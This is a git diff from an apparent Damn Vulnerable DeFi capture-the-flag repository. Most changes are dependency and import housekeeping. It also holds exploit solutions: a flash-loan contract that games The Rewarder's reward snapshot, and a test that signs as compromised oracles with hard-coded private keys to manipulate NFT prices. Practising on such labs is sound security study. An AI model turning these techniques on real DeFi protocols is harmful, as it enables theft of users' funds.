a

.gitmodules

@@ -67,3 +67,24 @@
 [submodule "foundry/lib/@uniswap/v4-periphery"]
 	path = foundry/lib/@uniswap/v4-periphery
 	url = https://github.com/Uniswap/v4-periphery
+[submodule "foundry/lib/@gnosis.pm/safe-contracts"]
+	path = foundry/lib/@gnosis.pm/safe-contracts
+	url = https://github.com/safe-global/safe-contracts
+[submodule "foundry/foundry/lib/@gnosis.pm/safe-contracts-v1.3.0"]
+	path = foundry/foundry/lib/@gnosis.pm/safe-contracts-v1.3.0
+	url = https://github.com/safe-global/safe-contracts
+[submodule "foundry/lib/@gnosis.pm/safe-contracts-v1.3.0"]
+	path = foundry/lib/@gnosis.pm/safe-contracts-v1.3.0
+	url = https://github.com/safe-global/safe-contracts
+[submodule "foundry/lib/@openzeppelin/contracts"]
+	path = foundry/lib/@openzeppelin/contracts
+	url = https://github.com/OpenZeppelin/openzeppelin-contracts
+[submodule "foundry/lib/@openzeppelin/contracts-v4.7.1"]
+	path = foundry/lib/@openzeppelin/contracts-v4.7.1
+	url = https://github.com/OpenZeppelin/openzeppelin-contracts
+[submodule "foundry/lib/@openzeppelin/contracts-upgradeable"]
+	path = foundry/lib/@openzeppelin/contracts-upgradeable
+	url = https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable
+[submodule "foundry/lib/@openzeppelin/contracts-upgradeable-v4.7.1"]
+	path = foundry/lib/@openzeppelin/contracts-upgradeable-v4.7.1
+	url = https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable

.prettierignore

@@ -15,3 +15,4 @@ lcov.info
 package-lock.json
 pnpm-lock.yaml
 yarn.lock
+foundry/lib

.solhintignore

@@ -0,0 +1 @@
+foundry/lib

README.md

@@ -54,6 +54,35 @@ git submodule add https://github.com/safe-global/safe-contracts foundry/lib/safe
 
 
 
+
+git submodule add https://github.com/Uniswap/v2-core foundry/lib/@uniswap/v2-core
+git submodule add https://github.com/Uniswap/v2-periphery foundry/lib/@uniswap/v2-periphery
+
+git submodule add https://github.com/Uniswap/v3-core foundry/lib/@uniswap/v3-core
+git submodule add https://github.com/Uniswap/v3-periphery foundry/lib/@uniswap/v3-periphery
+
+git submodule add https://github.com/Uniswap/v4-core foundry/lib/@uniswap/v4-core
+git submodule add https://github.com/Uniswap/v4-periphery foundry/lib/@uniswap/v4-periphery
+
+git submodule add https://github.com/safe-global/safe-contracts foundry/lib/@gnosis.pm/safe-contracts
+git submodule add https://github.com/safe-global/safe-contracts foundry/lib/@gnosis.pm/safe-contracts-v1.3.0
+# cd foundry/lib/@gnosis.pm/safe-contracts-v1.3.0 && git checkout tags/v1.3.0
+
+git submodule add https://github.com/OpenZeppelin/openzeppelin-contracts foundry/lib/@openzeppelin/contracts
+git submodule add https://github.com/OpenZeppelin/openzeppelin-contracts foundry/lib/@openzeppelin/contracts-v4.7.1
+# cd foundry/lib/@openzeppelin/contracts-v4.7.1 && git checkout tags/v4.7.1
+
+git submodule add https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable foundry/lib/@openzeppelin/contracts-upgradeable
+git submodule add https://github.com/OpenZeppelin/openzeppelin-contracts-upgradeable foundry/lib/@openzeppelin/contracts-upgradeable-v4.7.1
+# cd foundry/lib/@openzeppelin/contracts-upgradeable-v4.7.1 && git checkout tags/v4.7.1
+
+
+
+rm -rf .git/modules/foundry/lib/@uniswap
+git submodule deinit -f foundry/lib/@uniswap/
+git rm --cached -r foundry/lib/@uniswap
+
+
 forge install safe-global/safe-contracts --no-commit
 
 ```

contracts/CTF/Damn-Vulnerable-DeFi/00.Base/DamnVulnerableDeFi.sol

@@ -2,6 +2,9 @@
 pragma solidity ^0.8.0;
 
 import { ERC20 } from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
+import { ERC721 } from "@openzeppelin/contracts/token/ERC721/ERC721.sol";
+import { ERC721Burnable } from "@openzeppelin/contracts/token/ERC721/extensions/ERC721Burnable.sol";
+import { AccessControl } from "@openzeppelin/contracts/access/AccessControl.sol";
 
 /**
  * @title DamnValuableToken
@@ -13,3 +16,29 @@ contract DamnValuableToken is ERC20 {
         _mint(msg.sender, type(uint256).max);
     }
 }
+
+/**
+ * @title DamnValuableNFT
+ * @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
+ * @notice Implementation of a mintable and burnable NFT with role-based access controls
+ */
+contract DamnValuableNFT is ERC721, ERC721Burnable, AccessControl {
+    bytes32 public constant MINTER_ROLE = keccak256("MINTER_ROLE");
+    uint256 public tokenIdCounter;
+
+    constructor() ERC721("DamnValuableNFT", "DVNFT") {
+        _grantRole(DEFAULT_ADMIN_ROLE, msg.sender);
+        _grantRole(MINTER_ROLE, msg.sender);
+    }
+
+    function safeMint(address to) public onlyRole(MINTER_ROLE) returns (uint256 tokenId) {
+        tokenId = tokenIdCounter;
+        _safeMint(to, tokenId);
+        ++tokenIdCounter;
+    }
+
+    // The following functions are overrides required by Solidity.
+    function supportsInterface(bytes4 interfaceId) public view override(ERC721, AccessControl) returns (bool) {
+        return super.supportsInterface(interfaceId);
+    }
+}

contracts/CTF/Damn-Vulnerable-DeFi/05.The-Rewarder/05.The-Rewarder.sol

@@ -188,22 +188,22 @@ contract TheRewarderPool {
 }
 
 contract TheRewarderHack {
-    FlashLoanerPool flashloan;
-    TheRewarderPool pool;
-    DamnValuableToken dvt;
-    RewardToken reward;
+    FlashLoanerPool private flashLoanPool;
+    TheRewarderPool private pool;
+    DamnValuableToken private dvt;
+    RewardToken private reward;
     address internal player;
 
     constructor(address _flashloan, address _pool, address _dvt, address _reward) {
-        flashloan = FlashLoanerPool(_flashloan);
+        flashLoanPool = FlashLoanerPool(_flashloan);
         pool = TheRewarderPool(_pool);
         dvt = DamnValuableToken(_dvt);
         reward = RewardToken(_reward);
         player = msg.sender;
     }
 
-    function attack(uint256 amount) external {
-        flashloan.flashLoan(amount);
+    function attack() external {
+        flashLoanPool.flashLoan(dvt.balanceOf(address(flashLoanPool)));
     }
 
     function receiveFlashLoan(uint256 amount) external {
@@ -213,7 +213,7 @@ contract TheRewarderHack {
         // withdraw liquidity token
         pool.withdraw(amount);
         // repay to flashloan
-        dvt.transfer(address(flashloan), amount);
+        dvt.transfer(address(flashLoanPool), amount);
         uint256 rewardBalance = reward.balanceOf(address(this));
         reward.transfer(player, rewardBalance);
     }

contracts/CTF/Damn-Vulnerable-DeFi/06.Selfie/06.Selfie.sol

@@ -7,32 +7,6 @@ import "@openzeppelin/contracts-v4.7.1/interfaces/IERC3156FlashLender.sol";
 import "@openzeppelin/contracts-v4.7.1/interfaces/IERC3156FlashBorrower.sol";
 import { DamnValuableTokenSnapshot } from "../00.Base/DamnValuableTokenSnapshot.sol";
 
-interface ISimpleGovernance {
-    struct GovernanceAction {
-        uint128 value;
-        uint64 proposedAt;
-        uint64 executedAt;
-        address target;
-        bytes data;
-    }
-
-    error NotEnoughVotes(address who);
-    error CannotExecute(uint256 actionId);
-    error InvalidTarget();
-    error TargetMustHaveCode();
-    error ActionFailed(uint256 actionId);
-
-    event ActionQueued(uint256 actionId, address indexed caller);
-    event ActionExecuted(uint256 actionId, address indexed caller);
-
-    function queueAction(address target, uint128 value, bytes calldata data) external returns (uint256 actionId);
-    function executeAction(uint256 actionId) external payable returns (bytes memory returndata);
-    function getActionDelay() external view returns (uint256 delay);
-    function getGovernanceToken() external view returns (address token);
-    function getAction(uint256 actionId) external view returns (GovernanceAction memory action);
-    function getActionCounter() external view returns (uint256);
-}
-
 contract SelfiePool is ReentrancyGuard, IERC3156FlashLender {
     ERC20Snapshot public immutable token;
     SimpleGovernance public immutable governance;
@@ -105,6 +79,32 @@ contract SelfiePool is ReentrancyGuard, IERC3156FlashLender {
     }
 }
 
+interface ISimpleGovernance {
+    struct GovernanceAction {
+        uint128 value;
+        uint64 proposedAt;
+        uint64 executedAt;
+        address target;
+        bytes data;
+    }
+
+    error NotEnoughVotes(address who);
+    error CannotExecute(uint256 actionId);
+    error InvalidTarget();
+    error TargetMustHaveCode();
+    error ActionFailed(uint256 actionId);
+
+    event ActionQueued(uint256 actionId, address indexed caller);
+    event ActionExecuted(uint256 actionId, address indexed caller);
+
+    function queueAction(address target, uint128 value, bytes calldata data) external returns (uint256 actionId);
+    function executeAction(uint256 actionId) external payable returns (bytes memory returndata);
+    function getActionDelay() external view returns (uint256 delay);
+    function getGovernanceToken() external view returns (address token);
+    function getAction(uint256 actionId) external view returns (GovernanceAction memory action);
+    function getActionCounter() external view returns (uint256);
+}
+
 contract SimpleGovernance is ISimpleGovernance {
     uint256 private constant ACTION_DELAY_IN_SECONDS = 2 days;
     DamnValuableTokenSnapshot private _governanceToken;

contracts/CTF/Damn-Vulnerable-DeFi/10.Free-Rider/10.Free-Rider.sol

@@ -1,11 +1,11 @@
 // SPDX-License-Identifier: MIT
 pragma solidity ^0.8.0;
 
-import "@openzeppelin/contracts-v4.7.1/utils/Address.sol";
-import "@openzeppelin/contracts-v4.7.1/security/ReentrancyGuard.sol";
-import "@openzeppelin/contracts-v4.7.1/token/ERC721/IERC721.sol";
-import "@openzeppelin/contracts-v4.7.1/token/ERC721/IERC721Receiver.sol";
-import "../00.Base/DamnValuableNFT.sol";
+import { Address } from "@openzeppelin/contracts-v4.7.1/utils/Address.sol";
+import { ReentrancyGuard } from "@openzeppelin/contracts-v4.7.1/security/ReentrancyGuard.sol";
+import { IERC721 } from "@openzeppelin/contracts-v4.7.1/token/ERC721/IERC721.sol";
+import { IERC721Receiver } from "@openzeppelin/contracts-v4.7.1/token/ERC721/IERC721Receiver.sol";
+import { DamnValuableNFT } from "../00.Base/DamnValuableNFT.sol";
 
 contract FreeRiderNFTMarketplace is ReentrancyGuard {
     using Address for address payable;
@@ -180,3 +180,22 @@ contract FreeRiderRecovery is ReentrancyGuard, IERC721Receiver {
         return IERC721Receiver.onERC721Received.selector;
     }
 }
+
+interface IWETH {
+    function name() external view returns (string memory);
+    function approve(address guy, uint256 amount) external returns (bool);
+    function totalSupply() external view returns (uint256);
+    function transferFrom(address src, address dst, uint256 amount) external returns (bool);
+    function withdraw(uint256 amount) external;
+    function decimals() external view returns (uint8);
+    function balanceOf(address) external view returns (uint256);
+    function symbol() external view returns (string memory);
+    function transfer(address dst, uint256 amount) external returns (bool);
+    function deposit() external payable;
+    function allowance(address, address) external view returns (uint256);
+
+    event Approval(address indexed src, address indexed guy, uint256 amount);
+    event Transfer(address indexed src, address indexed dst, uint256 amount);
+    event Deposit(address indexed dst, uint256 amount);
+    event Withdrawal(address indexed src, uint256 amount);
+}

foundry/test/CTF/Damn-Vulnerable-DeFi/05.The-Rewarder.t.sol

@@ -18,11 +18,11 @@ import { Math } from "@openzeppelin/contracts/utils/math/Math.sol";
 
 /*
     https://www.damnvulnerabledefi.xyz/challenges/naive-receiver/
-    
+
     forge test --match-path foundry/test/CTF/Damn-Vulnerable-DeFi/05.The-Rewarder.t.sol -vvvvv
 */
 
-contract The_Rewarder_03_Test is Test {
+contract _03_Test is Test {
     using FixedPointMathLib for uint256;
 
     address private deployer = address(1);
@@ -65,13 +65,15 @@ contract The_Rewarder_03_Test is Test {
 
         assertTrue(accountingToken.hasAllRoles(address(rewarderPool), mintRole | snapShotRole | burnerRole));
 
-        uint256 depositAmount = 100e18;
+        uint256 depositAmount = 100 ether;
         for (uint256 i = 0; i < users.length; i++) {
             liquidityToken.transfer(users[i], depositAmount);
             vm.startPrank(users[i]);
+
             liquidityToken.approve(address(rewarderPool), depositAmount);
             rewarderPool.deposit(depositAmount);
             assertEq(accountingToken.balanceOf(users[i]), depositAmount);
+
             vm.stopPrank();
         }
         vm.warp(block.timestamp + 5 days);
@@ -98,7 +100,7 @@ contract The_Rewarder_03_Test is Test {
 
         TheRewarderHack hackInst =
         new TheRewarderHack(address(flashLoanPool), address(rewarderPool), address(liquidityToken), address(rewardToken));
-        hackInst.attack(TOKENS_IN_LENDER_POOL);
+        hackInst.attack();
         /* END CODE YOUR SOLUTION */
         vm.stopPrank();
         _after();

foundry/test/CTF/Damn-Vulnerable-DeFi/07.Compromised.t.sol

@@ -15,7 +15,7 @@ import {
 
 /*
     https://www.damnvulnerabledefi.xyz/challenges/naive-receiver/
-    
+
     forge test --match-path foundry/test/CTF/Damn-Vulnerable-DeFi/07.Compromised.t.sol -vvvvv
 */
 
@@ -75,7 +75,9 @@ contract Compromised_07_Test is Test {
 
     function test_Exploit() public {
         /* START CODE YOUR SOLUTION HERE */
+        // 0xe92401A4d3af5E446d93D11EEc806b1462b39D15
         oracle1 = vm.addr(0xc678ef1aa456da65c6fc5861d44892cdfac0c6c8c2560bf0c9fbcdae2f4735a9);
+        // 0x81A5D6E50C214044bE44cA0CB057fe119097850c
         oracle2 = vm.addr(0x208242c40acdfa9ed889e685c23547acbed9befc60371e9875fbcd736340bb48);
 
         _postPrice(0.0001 ether);